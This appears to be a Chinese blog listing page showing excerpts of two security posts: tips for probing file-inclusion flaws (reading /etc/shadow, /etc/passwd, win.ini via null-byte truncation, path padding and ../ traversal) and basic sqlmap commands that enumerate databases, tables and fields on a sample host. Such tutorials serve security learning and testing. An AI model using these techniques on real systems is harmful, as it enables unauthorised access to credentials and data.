sql
关注
分享
扫一扫
我就是余某人
这个作者很懒,什么都没留下…
展开
-
文件包含漏洞尝试思路
1、观察提示,是否为系统文件,如win.ini在windows系统的c:/windows/win.ini中,boot.ini在windows系统的c:/boot.ini中linux里有:/etc/shadow /etc/passwd2、带入文件,如果有后缀被自动加上,如果报错,尝试加入%00进行截断,如果报错,尝试加入绝对路径,比如c:/windows/win.ini%00,如果报错,尝试使用…达到256个字符进行截断,尝试加入…/,可以多加几个,因为在有的包含中代码中会加上一个路径前缀,所以我们必须通原创 2020-10-09 08:37:55 · 794 阅读 · 0 评论 -
sqlmap基础注入
sqlmap基础注入判断有无注入python sqlmap.py -u “http://192.168.1.1/list.php?id=1” --batch注入数据库python sqlmap.py -u “http://192.168.1.1/list.php?id=1” --dbs --batch注入表python sqlmap.py -u “http://192.168.1.1/list.php?id=1” -D KM --tables --batch注入字段python sqlmap原创 2020-10-09 08:35:44 · 656 阅读 · 1 评论